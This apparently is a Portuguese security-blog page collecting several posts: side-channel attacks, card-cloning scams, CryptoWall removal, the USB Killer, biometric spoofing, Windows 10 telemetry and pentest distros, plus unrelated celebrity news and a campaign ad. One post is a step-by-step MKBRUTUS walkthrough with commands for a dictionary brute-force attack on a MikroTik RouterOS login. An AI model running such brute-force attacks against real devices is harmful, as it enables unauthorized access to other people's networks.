Johnny Depp viverá o milionário (e maluco) John McAfee nos cinemas

 

Há alguns anos, John McAfee era uma das maiores autoridades em segurança virtual do mundo. Hoje em dia, ele ainda acumula muito conhecimento, mas é mais conhecido por ter surtado e virado um “milionário malucão”. E é exatamente esse lado do empresário que será retratado nos cinemas.

Segundo o site Deadline, a vida de John McAfee será em breve contada nas telonas em um longa-metragem chamado “King Of The Jungle” (“Rei da Selva”, em tradução literal). E o ator Johnny Depp, da franquia Piratas do Caribe e muitas outras superproduções, é o escolhido para interpretar o responsável por um dos antivírus mais famosos do mundo.

A promessa é de “paranoia, metralhadoras, sexo e assassinato” — e McAfee se envolveu com tudo isso

Por enquanto, o filme ainda nem está em produção, mas já há uma sinopse inicial. A produção vai contar a história de McAfee já em sua fase “louca”, levando um jornalista da revista Wired para sua residência em Belize em um “tour de humor negro no estilo Acapocalypse Now”. A promessa é de “paranoia, metralhadoras, sexo e assassinato” — e McAfee se envolveu com tudo isso depois de abandonar a marca que leva seu próprio nome.

“King of the Jungle” não tem qualquer previsão de estreia até o momento.

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista

Mr Claytonet 20666

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi

Porque escolhi o numero 20666?
Por causa do Route 66 MC 🙂

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

BRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Veja o ataque na pratica:
01 Passo

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Verifique a versão atual do python em seguida realiza a instalação da versão 3

root@kali:~# python –version (Exibe a versão do Python)

root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

02 Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

root@kali:~# python –version (Exibe a versão do Python)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

03 Passo

Realize o download do projeto mkbrutus

root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

04 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~# chmod -R 755 mkbrutus/

root@kali:~# cd mkbrutus/

root@kali:~/mkbrutus# ls -l

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

05 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~/mkbrutus# python3 mkbrutus.py -h

-h : Help (Ajuda)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

06 Passo

São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

07 Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net

root@kali:~/mkbrutus# cat senhas.txt

 

Conteúdo do arquivo senhas.txt

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

08 Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt

  • mkbrutus.py : Ferramenta de Brute Force
  • 192.168.0.1 : IP do Roteador MikroTik
  • senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

Usuário: admin
Senha: P@ssw0rd

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:

Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa

Projeto: github.com/mkbrutusproject/mkbrutus

Fonte: 100security

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Este artigo demonstra ao público em geral que existem formas de ataque que podem ser feitas aos algoritmos criptográficos que fogem do aspecto matemático, puro e simples.

O artigo, escrito originalmente por WILLIAM BUCHANAN da Napier University, demonstra de forma inequívoca que, algoritmos supostamente seguros podem, de fato, serem atacado por métodos não convencionais – mas científicos porcerto – numa linguagem simples e acessível a todos.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Abaixo, segue uma tradução livre feita por mim deste artigo (respeitando ao máximo o conteúdo original), preservando também as imagens que Prof.Buchanan pôs

Ao final, todos os links que embasam o artigo.


Agora a Criptografia pode ser Quebrada através das Paredes

A quebra de chaves de criptografia tem envolvido frequentemente métodos de força bruta, ou falhas de segmentação em sua implementação. Há, porém, o interesse crescente em ataques físicos indiretos  (nota: no original, Physical Side-Channel Attacks), onde há um vazamento não-intencional de informações da criptografia, tais como de radiação eletromagnética, consumo de energia, flutuações de tensão elétrica e variações do mesmo som e térmicas.

Poucas empresas atualmente protegem seus dispositivos contra ataques indiretos, especialmente se se provassem dispendiosos, e exigem extensos testes com equipamentos complexos.

Dispositivos também estão se tornando mais rápidos, e, naturalmente deles, são propensos a emitir uma quantidade crescente de emissões de rádio e eletromagnética (EM). Um processador de 2GHz, por exemplo, está rodando por volta da mesma frequência que nossos sinais de Wi-Fi (2.4 GHz), e muitas vezes os chips não são protegidos contra emissões de ondas de rádio que são um subproduto natural da operação rápida do dispositivo. Nessas altas freqüências, é geralmente difícil impedir emissões de EM para fios nas proximidades e em outros circuitos.

Ataques por Canais Laterais

Tem havido trabalhos sobre a quebra do algoritmo RSA com métodos acústicos, juntamente com variações eletromagnéticas e de tensão. Agora, os pesquisadores tomaram um significativo passo à frente, conforme documento “ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs” (Ataques de Extração de chaves ECDH via Eletromagnetismo de Baixa-Frequência em PC’s).

Dentro deste documento, os autores descrevem a quebra do ECDH (Curva Elíptica Diffie-Hellman), que é um dos mais populares métodos de troca de chaves e é muitas vezes usado ao se conectar a sites como Microsoft Live, Google e Facebook.

No trabalho eles atacam o algoritmo de criptografia de chave pública ECDH e medem as mudanças eletromagnéticas. Este ataque usa um método “texto codificado escolhido” (nota: Choosen Ciphertext Attack, um método bastante conhecido há décadas), e uma técnica de análise de tempo-freqüência de sinal, de forma a quebrar a chave. Isso revela a chave de descriptografia em poucos segundos, vinda de uma antena em outra sala.

ECDH é agora um método popular, e é basicamente o método de troca de chaves Diffie-Hellman com o uso de métodos de Curva Elíptica:

(Nota: veja aqui uma explicação sobre Curva Elíptica)

Análise de Tensão

O trabalho de modulação em trilhas dos chips é bem documentado, para descobrimento das chaves de criptografia, onde a segurança e a proteção da chave é reduzida. Também houve trabalho sobre um “cold boot” onde os chips de memória são “congelados”, mantendo seus estados de informação/bit:

Análise Diferencial de Alimentação em cartões SIM

Até agora, todos pensamos que cartões SIM estavam seguros da maioria dos tipos de ataque.

Mas Prof. Yu-Yu, da Shanghai Jiao Tong University, tem mostrado agora que os cartões SIM 3G/4G, usando AES de 128 bits, podem ser quebrados – portanto, o pesadelo de clonagem de cartão SIM poderia se tornar realidade (vide este link).

 O acesso às chaves de criptografia SIM é um foco importante para a aplicação da Lei, e destacou-se no início do ano quando os agentes de certa Autoridade foram suspeitos de roubar bilhões de chaves de criptografia do fabricante holandês de cartões Gemalto.

Essas chaves permitiriam o acesso a mensagens de voz e dados nos telefones.

Em sua apresentação de Black Hat USA 2015 nesta semana, Prof. Yu-Yu descreveu como um método de análise diferencial de alimentação/tensão que recupera chaves de criptografia de cartões SIM, o que permite serem então clonados. No geral, demora de 10 a 40 minutos para recuperar a chave e seu método foi bem-sucedido em oito dos fabricantes mais populares de cartão SIM.

Ele usa, basicamente, um osciloscópio para capturar as mudanças de energia e um analisador de protocolo MP300-SC2, juntamente com um PC para analisar a criptografia. O trabalho usa Análise Diferencial de Alimentação (DPA – Differential Power Analysis). Com Análise de Alimentação Simples (SPA – Simple Power Analysis) monitoramos a tensão consumida pelo processador e isto pode dar dicas sobre o conteúdo dos seus registradores e BUSes.

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

Golpes populares e como não ser enganado com seu cartão de crédito

Com o advento da tecnologia, suas facilidades e economia de tempo, ter um cartão de crédito, que muito facilita nossas vidas, também abre outro precedente desagradável: a clonagem dos cartões.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Os fraudadores possuem diversas táticas para fazer com que o dono do cartão caia em um golpe. Para se ter ideia de como eles atuam, os bandidos colocam um aparelho chamado “chupa-cabra” que copia as trilhas magnéticas do cartão em um caixa eletrônico de uma agência bancária, ou ainda instalam uma câmera e filmam o cliente digitando a senha no leitor de cartões.

Estes aparelhos que roubam a identificação magnética dos cartões nada mais são do que leitoras comuns alteradas para que passem a gravar estes códigos e reproduzi-los em cartões quaisquer. No entanto, este método é um tanto grosseiro para os padrões tecnológicos que temos hoje. Infelizmente, a genialidade existe para o bem e para o mal.

Como acontecem as clonagens de cartão e como evitá-las

Com a chegada dos sites bancários e das funções home-banking, o bandido só precisa encontrar um arquivo espião para fazer com que a senha e o número de cartão de crédito sejam roubados do computador do cliente. Para isso acontecer, basta um e-mail fraudulento, cujo layout é idêntico aos das instituições bancárias. Ao abri-lo ou preencher algum campo solicitado é o suficiente para que um malware (arquivo malicioso) seja instalado no seu computador e que retransmitirá seus dados para essas quadrilhas.

O processo de clonagem é mais simples do que muita gente pode imaginar. Porém, exige um arsenal de equipamentos que chegam a custar mais de 10 mil dólares. Nestes casos, o falsário não trabalha com materiais quaisquer e sim com réplicas quase idênticas aos cartões originais das operadoras mais variadas. Para fazer essa falsificação as quadrilhas utilizam impressoras de cartões, máquinas para criação de hologramas, impressão das letras em alto relevo e uma série de outros equipamentos.

As compras pela internet têm aumentado sensivelmente os números de fraudes envolvendo cartões de crédito em todo o Brasil. Os mesmos arquivos maliciosos escondidos em emails falsos roubam informações como número do cartão, data de validade e o código de segurança de três dígitos. Com esses dados, qualquer pessoa pode fazer compras no nome de quem quer que seja o dono daqueles dados. Por isso, se você costuma abrir todos os emails que chegam à sua caixa de entrada, comece a ser um pouco mais seletivo e desconfie de remetentes desconhecidos.

Abaixo relatamos alguns dos golpes mais usados e como evitá-los:

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

• Alguém liga para a sua casa se identificando como um funcionário da operadora do seu cartão de crédito e informa que foi feita uma compra de um objeto bastante incomum no seu nome com um valor bastante alto.

Ao responder que não fez a compra, você dará brecha para que o bandido diga que o seu cartão talvez tenha sido clonado e que é preciso fazer uma verificação. Ele pedirá que você informe o seu endereço, número do cartão e o número do PIN. Com esses dados o fraudador poderá fazer compras no seu nome a qualquer hora do dia. Ao final da ligação o suposto atendente pede que você telefone para a central de segurança da operadora do cartão informando o ocorrido, pois, certamente, já existirá uma compra no seu cartão e dessa vez ela é verdadeira e aconteceu por você ter cedido os números de segurança do seu cartão de crédito. Por isso, nunca diga a ninguém informações referentes à sua conta bancária ou cartões de débito ou crédito. Além de ser perigoso, você, sem saber, acaba colaborando com o seu prejuízo.

• Outro golpe bastante difundido é o “chupa-cabras”, ao qual nos referimos no início.

Como não podemos saber se aquela máquina de pagamentos está ou não adulterada, procure nunca permitir que o atendente leve o cartão para longe da sua vista. Toda precaução é pouca quando, o que está em jogo, é manter o seu nome limpo na praça. Por isso, sempre que for realizar pagamentos com o seu cartão, fique atento para qualquer movimentação estranha. Caso o seu cartão fique preso na máquina da loja ou no caixa eletrônico, procure anular ou cancelar a compra e comunique imediatamente o seu banco. Se utilizar o telefone da cabine do caixa, verifique se o telefone funciona. Em caso negativo, o golpe é quase certo e não aceite ajuda de nenhum estranho.

É importante que você se certifique que ninguém está observando enquanto estiver digitando a sua senha. É um direito seu exigir que as outras pessoas aguardem a vez respeitando as faixas marcadas no chão do banco. Dessa maneira você evita dores de cabeça envolvendo a segurança dos cartões e da conta bancária.

Cartões com chip: aumento na segurança?

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-lasOs cartões com chip aumentaram de certa forma, a segurança dos usuários. Essa tecnologia unificou dois cartões em um só e evita que o cliente ande com um cartão para débito e outro para crédito como acontecia com os cartões magnéticos. Os chips possuem mais memória e fazem com que um único cartão possua as duas opções de pagamento: débito e crédito.

Um dos motivos pelos quais os cartões de chip são tão mais seguros que aqueles com tarja magnética está no fato de que essa nova tecnologia trabalha com autenticação offline, ou seja, não exige que o terminal (caixa eletrônico) esteja conectado com qualquer tipo de sistema além do que já está instalado. Esse tipo de cartão também é mais seguro no que se refere às transações feitas pela internet e dispensa a assinatura do portador, uma vez que o PIN do cartão é capaz de substituir essa necessidade.

A segurança dos chips também está no fato de que todos os dados contidos neste sistema estão criptografados. Entretanto, de nada adianta avançar cada vez mais a tecnologia para garantir a segurança dos usuários se o próprio cliente não toma os devidos cuidados com os seus cartões e documentos. Até mesmo os cartões de ônibus e metrô já passam por situação semelhante. Porém, a técnica para isso é diferente, afinal o sistema de funcionamento desses cartões é baseado em um sistema de Identificação por Frequência de Rádio – a mesma utilizada em etiquetas inteligentes em lojas.

Mas, como comentamos acima, a mesma genialidade que trabalha para a segurança, também trabalha para a criminalidade. Mesmo os cartões com chip sendo mais seguros que os que possuem tarja magnética devemos estar atentos na hora de realizar transações bancárias.

Cartões RFID usam frequências de rádio para transmitir dados. É possível usar esses cartões em lojas e restaurantes para realizar pagamentos, sem a necessidade de passar o cartão em um leitor. A tecnologia RFID também permite que ladrões obtenham informações sem precisar ver o cartão. Esse artigo lhe dirá como manter seus cartões de crédito seguros.

Fontes:

netpatrol.org
cardcom.com.br

O que é e Como Remover o CryptoWall 3.0 (Ransomware)

O que é o CryptoWall 3.0?

O que é e Como Remover o CryptoWall 3.0 (Ransonware)

Já falamos bastante sobre Ransomwares aqui no Claytonet e desta vez vamos mostrar como remover o CryptoWall 3.0 é um perigoso vírus tipo Ransomware, que pode facilmente acabar com sua pesquisa ou informações corporativas importantes.

Esta ameaça pode facilmente bloquear seus arquivos, iniciar chantagem que você e pode até tentar deixar você sem dinheiro. Se você quiser evitar esses problemas, você deve tentar fazer o seu melhor ao tentar evitar CryptoWall 3,0 e suas versões anteriores, tais como Cryptowall,Cryptolocker, CTB Locker, etc. Caso contrário, você pode ficar sem os seus documentos importantes, fotos, arquivos de vídeo e dados semelhantes.

Sabe-se que 3,0 Ransomware CryptoWall procura essas extensões de arquivo para criptografar:

3fr, accdb, ai, arw, bay, cdr, cer, cr2, crt, crw, dbf, dcr, der, dng, doc, docm, docx, dwg, dxf, dxg, eps, erf, indd, jpe, jpg, kdc, mdb, mdf, mef, mrw, nef, nrw, odb, odm, odp, ods, odt, orf, p12, p7b, p7c, pdd, pef, pem, pfx, ppt, pptm, pptx, psd, pst, ptx, r3d, raf, raw, rtf, rw2, rwl, srf, srw, wb2, wpd, wps, xlk, xls, xlsb, xlsm e xlsx.

Após diagnóstico de cada uma dessas extensões, vírus os criptografa. Sabe-se que este é feito com a ajuda do algoritmo de criptografia CBC AES 256 bit, o que significa que a única maneira de decodificar cada um dos arquivos criptografados é obter uma chave de decodificação.

Depois de fazer isso, Cryptowall começa mostrando uma enorme mensagem de aviso que instrui a vítima como ele/ela pode desbloquear cada um dos arquivos criptografados. Normalmente, vírus pede para baixar e instalar Tor browserweb, inicie-o e, em seguida, visite seu site. Aqui, a vítima é solicitado o pagamento de um resgate de US$ 500. Depois de não ter de fazer o pagamento no prazo de 7 dias úteis, o resgate é aumentado para $1000. No entanto, queremos encorajar-vos a não pagar a multa.

Não há nenhuma garantia de que após te forçarem a pagar o resgate, para descriptografar os arquivos criptografados, os proprietários iram te enviar a chave de decodificação.

No momento em que este artigo foi escrito, ransomwares tornaram-se um grave problema para os usuários de PC, por isso não há muitos desenvolvedores que já começaram a projetar ferramentas específicas que podem ajudar os usuários de PC.

  1. Se o ransomware CryptoWall 3.0 apenas apareceu na sua área de trabalho, você deve executar uma varredura completa do sistema com SpyHunter e impedir que seus arquivos sejam criptografados.
  2. Além disso, você deve tentar estes programas para descriptografar os arquivos: R-StudioPhotorec.

Cryptowall

Se você quiser evitar ransomwares, como CryptoWall 3.0, você tem que tomar alguns cuidados.

  1. Em primeiro lugar, certifique-se de que tem um bom anti-spyware instalado no seu computador. Além disso, tente mantê-lo atualizado.
  2. Não abra emails suspeitos, pois é a principal forma de contagio do Crypowall 3.0.
  3. Se aparência de um e-mail suspeito, é cheio de erros ortográficos ou erros gramaticais ou se você não sabe quem é o remetente, você deve ignorá-lo.
  4. Você pode tentar contato com a pessoa que é responsável por este e-mail e verifique duas vezes ele/ela. Caso contrário, você poderá ser levado a clicar no link mal intencionado ou fazendo o download de um anexo de e-mail infectado.
  5. Se o CryptoWall 3.0 entra no sistema, ele leva alguns minutos para verificar se ela e selecionando arquivos necessários. Além disso, bloqueia-os e começa pedindo para pagar um resgate.

Como remover o Ransomware CryptoWall 3.0?

Se você está olhando para uma grande mensagem que alega que seus arquivos são bloqueadas por causa de ransomware e que você precisa pagar um resgate para desbloquear-los, você está infectado por ransomware. (Veja mais informação sobre Ransomwares aqui!) A fim de extrair CryptoWall 3.0 vírus, você deve usar um detalhado guia remoção para baixo. Se você deseja restaurar conexão com seus arquivos, você deve tentar usar seus backups ou, se não tiver, tente executar um desses instrumentos como recuperação de arquivos R-Studio ou Photorec.

Além disso, a Kaspersky Lab apresentou também uma ferramenta para descriptografar arquivos criptografados, para que você também deve tentar Kaspesky Ransomware Decryptor.

Atenção: Não pagar o resgate porque isso não garante que você irá receber a chave para descriptografar os arquivos.

É altamente recomendável pensar sobre a prevenção de infecções, como Cryptowall. Para que você possa usar programas mencionados anteriormente. Além disso, não se esqueça de pensar sobre a imunidade de seus arquivos ebackup. Para que você possa utilizar discos rígidos externos USB, CDs, DVDs, ou simplesmente contar com backups on-line, como o Google Drive, Engrenagens, Flickr e outras soluções.

 Aqui ferramentas para remoção dos Ransomwares CryptowallCryptolocker e  CTB Locker

Fonte: http://semvirus.pt/cryptowall-3-0-virus/

USB Killer: Como funciona o pendrive que queima PC, NoteBook, TV e qualquer outro dispositivo com entrada USB

USB Killer: Como funciona o pendrive que queima PC, NoteBook, TV e qualquer outro dispositivo com entrada USB

Cada vez mais a ficção confunde-se com a realidade. Nos últimos dias muitos sites noticiaram sobre o USB KILLER V2.0 e deixaram muita gente assustada com esta possibilidade, no cinema já vimos o cenário tecnológicos ter muitos fins,  na vida real o USB KILLER V2.0 pode queimar o PC, NoteBook, TV e qualquer outro dispositivo que faça uso do USB!

Um homem que caminhava pelo metro quando passa por uma ladrão que rouba seu “Pendrive” o (USB Killer 2.0) que tinha na sua bolsa. O “pendrive” tinha o número “128 GB” escrito. Justamente para quando o ladrão chegar em casa, curioso, inserir o Pendrive na porta USB no dispositivos e em vez de descobrir informação valiosa ou ganhar um pendrive de 128GB… apenas conseguiu queimar o seu computador e talvez ainda outro dispositivo. Quando o ladrão retirou o “Pendrive” o (USB Killer 2.0) e alterou o texto de “128” para “129”. Mais tarde deixou o pendrive no metro para o coitado do 130 HAHAHA!

Esta história foi contada a um investigador russo que tem um nickname de Dark Purple. Este achou o conceito muito interessante e desenvolveu o seu próprio sistema USB para fritar computadores USB Killer

Quando ligarmos este dispositivo a uma porta USB, um inversor DC/DC um conversor será executado e carregará os condensadores para – 110V. Quando for atingida a voltagem, o conversor DC/DC desliga-se. Nesse mesmo momento, abre-se o Transistor de efeito de campo (FET).

Explicou o investigador Dark Purple.

USB Killer: Como funciona o pendrive que queima PC, NoteBook, TV e qualquer outro dispositivo com entrada USB

Assim fica funcional uma USB Killer que irá destruir efetivamente componentes sensíveis do computador quando o for ligada.

É utilizado para aplicar -110V às linhas da interface USB. Quando a tensão nos condensadores aumenta para -7V, o transístor fica em corte e começa a amplificação DC/DC. O ciclo continua indefinidamente até que tudo esteja queimado.

Por isso se você chegar no trabalho e encontrar um pendrive sobre o teclado. Se você inocentemente apenas liga seu computador e coloca  na porta USB para ver o que há dentro dele, e de repente seu PC não funciona mais. Você pode ter sido vítima de uma das pegadinhas mais cruéis que a tecnologia pode oferecer: o USB Killer.

O USB Killer foi revelado ao mundo em março deste ano por esse pesquisador russo “Dark Purple”, e agora ganhou a nova versão USB Killer 2.0 ainda mais mortal. Segundo seu criador, O USB Killer 2.0 é capaz de fritar praticamente qualquer dispositivo que possua uma interface USB (Notebooks, Computadores, TVs, DVDs, aparelho de som de carro e etc…)

O USB Killer 2.0 se disfarça como um pendrive, mas ele não tem o menor intuito de guardar arquivos. Sua única função é armazenar energia para descarregar toda essa energia de uma vez só de volta no computador (ou outro dispositivo com porta USB), queimando a máquina. A nova versão USB Killer 2.0 usa o dobro da tensão do que a anterior para fazer seu estrago.

Você pode ver o USB Killer 2.0 em ação neste vídeo abaixo:

Este é o diagrama de um projeto bem parecido com o do USB Killer 2.0

USB Killer: Como funciona o pendrive que queima PC, NoteBook, TV e qualquer outro dispositivo com entrada USB

Starbug afirma e prova: Biometria é falha

Starbug afirma e prova: Biometria é falha

A coisa soa meio maluca, mas em tratando-se de Starbug, eu não riria…

Starbug é o pseudônimo de Jan Krissler, um camarada prá lá de excêntrico, mas que assusta todos com suas descobertas – sendo a última a falsificação do dedo da ministra da Defesa da Alemanha, Ursula von der Leyen, baseada em fotos de alta-resolução disponíveis na Internet (veja detalhes em POST aqui no grupo). Cabe mencionar também que ele já “hackeou” o Touch-ID da Apple… o camarada não é mole.

                        
Desta vez, Starbug mostrou no Biometrics Conference 2015 em Londres que, aproveitando “selfies moments” (os momentos que as pessoas tiram fotos de si mesmas usando smartphones) e ampliando devidamente, ele consegue obter os PIN-codes destes celulares através da análise da córnea das pessoas – em outras palavras, ele lê o reflexo da senha digitada no branco dos olhos enquanto a pessoa o digita. Doideira? Parece, mas não é…

Aliás, em outra demonstração, Starbug diz ser possível extrair dados da íris dos olhos de qualquer pessoa e imprimir devidamente em lentes-de-contato opacas, enganando quaisquer sensores biométricos de íris.

Lembro que a grande maioria destes sensores não percebem organismos vivos (estes existem, mas possuem custo bastante elevado); assim sendo, ele garante que é fácil enganar sensores de impressões digitais, íris e até leitura facial.

Starbug afirma e prova: Biometria é falhaStarbug afirma que consegue resultados fantásticos usando uma câmera digital SLR com lentes de 200ml (usadas para fotos de grande distância) e foi assim que conseguiu falsificar a digital da Ministra da Defesa.

Nesta conferência, Starbug demonstrou suas descobertas, afirmando que, “apesar de acreditar que o futuro esteja na biometria, é muito importante que os sensores sejam todos adaptados a perceber organismos vivos.”

Tenho minhas dúvidas… A maioria destes sensores trabalha com temperatura (exceto os mais sofisticados sensores de capilares, que percebem a pulsação sanguínea), portanto, são ainda muito rudimentares. E não vejo no sensor o calcanhar de Aquiles destes sistemas, mas na transmissão da informação biométrica (que pode ser interceptada e falsificada) e na segurança do banco-de-dados, que pode ter a informação original trocada pela do atacante e depois restaurada ao seu original.

Em tempo: já há um grave problema de contrabando de dados biométricos acontecendo em todo o mundo. Hackers vêm furtando e vendendo estes dados, permitindo um sem-número de fraudes baseadas em “furto de identidade”.

Windows 10 te espiona mesmo desabilitando a telemetria

 Há algum tempo atrás postei em nosso grupo do Linked-IN vários artigos sobre o fato do Windows 10 espionar dados de usuário – e até solicitei uma resposta da Microsoft a este respeito.

Windows 10 te espiona mesmo desabilitando a telemetria

Neste ínterim, vários foram os artigos publicados por especialistas mostrando como desativar a TELEMETRIA, conjunto de procedimentos da Microsoft que fornecem dados de uso (e do usuário) à empresa de Baltimore. Vários são os “KB” que precisam ser desativados (as atualizações de segurança que a MS envia a todos os Windows automaticamente) e, no caso do Windows 10, impossíveis de serem.

Agora sabe-se que tudo isso é inútil, de acordo comCheesusCrust, um usuário do VOAT.

Curioso para saber a extensão deste monitoramento, CheesusCrust montou em seu laptop Linux uma máquina virtual com Windows 10 ENTERPRISE e acoplou um roteador DD-WRT para monitoramento do tráfego.

Antes de iniciar sua análise, ele desativou todos os recursos de rastreamento e telemetria do sistema operacional,deixando a máquina ligada por toda uma noite, em um esforço de monitorar o que o Windows 10 estaria fazendo neste período.

O Resultado foi Surpreendente

Após 8 horas de idle-time (tempo ocioso, já que o Windows não foi utilizado durante este período), ele descobriu que o Windows 10 tinha tentado mais de 5500 conexões para 93 endereços-IP diferentes – dos quais 4000 conexões foram feitas para 51 IP’s diferentes e pertencentes à Microsoft.

Após 30 horas, ChesseCrust percebeu que o Windows 10 tinha expandido as conexões para 113 endereços-IP não privados, ou seja, potencialmente permitindo que hackers interceptassem estes dados.

Não satisfeito, ele instalou uma “ferramenta de terceiros” chamada DisableWinTracking, o que muito pouco adiantou: ainda assim houveram 2758 conexões para 30 endereços-IP diferentes. E o mais interessante é que a versão em teste (Enterprise), por ser uma versão de uso corporativo, permite muito mais granularidade do usuário nas regulagens e configurações, muito mais que a versão HOME EDITION utilizada por imensa parcela do público. Em outras palavras: se até nesta versão e desabilitando tudo o Windows 10 fez este tipo de rastreamento, o que será então do usuário comum?

Obviamente que não se pode afirmar que o Windows 10 está enviando seus dados pessoais para os servidores da Microsoft, mas se há de convir que esta atividade toda em apenas 8 horas não se justifica apenas em busca de atualizações e acerto de data e hora.

Top 10: Sistemas operacionais para Hackers e Pentesters

Top 10: distros Linux para Hackers e Pentesters

Veja a diferença entre um Hacker e um profissional de Pentest

Top 10: distros Linux para Hackers e Pentesters

Top 10: Sistemas operacionais para Hackers e Pentesters

Diferente de antigamente, nos dias de hoje está cada vez mais comum encontrar sistemas operacionais para auditoria em sistemas. Com o avanço da tecnologia, as técnicas de invasão e auditoria em sistemas estão cada vez mais se automatizando. Então surgiu uma nova filosofia de trabalho chamado “PENTEST”

Hacker

Em informática, hacker é um indivíduo que se dedica, com intensidade incomum, a conhecer e modificar os aspectos mais internos de dispositivos, programas e redes de computadores. Graças a esses conhecimentos, um hacker frequentemente consegue obter soluções e efeitos extraordinários, que extrapolam os limites do funcionamento “normal” dos sistemas como previstos pelos seus criadores; incluindo, por exemplo, contornar as barreiras que supostamente deveriam impedir o controle de certos sistemas e acesso a certos dados.

Pentest

O Teste de Intrusão (do inglês “Penetration Test” ou Pentest”), também traduzido como “Teste de Penetração”, é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma má configuração do sistema, falhas em hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas contra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadas no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta de resolução ou de uma solução técnica.

Abaixo citamos os Sistemas operacionais mais usado da atualidade pelos os profissionais de TI que trabalha com auditoria de sistemas.

Sistemas operacionais para Hackers e Teste de Intrusão

1. Kali Linux

Top 10: distros Linux para Hackers e Pentesters

Kali Linux é um projeto open source que é mantido e financiado pela offensive security, uma empresa especializada em treinamento de segurança da informação, conhecida mundialmente. Além do Kali Linux, Offensive Security também mantém o site exploit-tb com um banco de dados com milhares de Exploits e um curso on-line gratuito sobre o Metasploit.

Site: Kali Linux

2. Backbox

Top 10: distros Linux para Hackers e Pentesters

BackBox é uma distribuição GNU/Linux derivada do Ubuntu, voltada para executar testes de penetração e de vulnerabilidade, o sistema dispõe de várias ferramentas para análise de sistemas e de redes.

O projeto foi originalmente desenvolvido na Itália em 2010, contudo em poucos meses tornou-se uma comunidade global. Atualmente, o projeto está sendo realizado com o apoio da comunidade internacional de software livre.

Site: BackBox

3. Arch Linux

Top 10: distros Linux para Hackers e Pentesters

Arch Linux (ou Arch) é um sistema operacional baseado em Linux para computadores i686 e x86-64. É composto predominantemente por software livre e de código aberto, e envolve contribuições da comunidade.

O desenvolvimento é focado na elegância, minimalismo e simplicidade no código, e espera que o usuário faça alguns esforços para compreender o modo de funcionamento do sistema. O gerenciador de pacotes, Pacman, foi escrito especialmente para o Arch Linux e é usado para instalar, remover e atualizar os pacotes do sistema.

Site: Arch Linux

4. Samurai Web Security framework

Top 10: distros Linux para Hackers e Pentesters

O Samurai Web Testing Framework é um ambiente é pré-configurado para funcionar como um ambiente web pentest. O sistema contém ferramentas gratuitas para realização e simulação de ataque real e virtual.

Site: Samurai

5. Parrot-sec Forensic OS

Top 10: distros Linux para Hackers e Pentesters

Parrot-sec Forensic OS é um sistema operacional focado em segurança e projetado para pentest, computação forense, engenharia reversa, Hacking, privacidade/anonimato e criptografia. Baseado no Debian e desenvolvido pela empresa Frozenbox.

Site: Parrot

6.Bugtraq

Top 10: distros Linux para Hackers e Pentesters

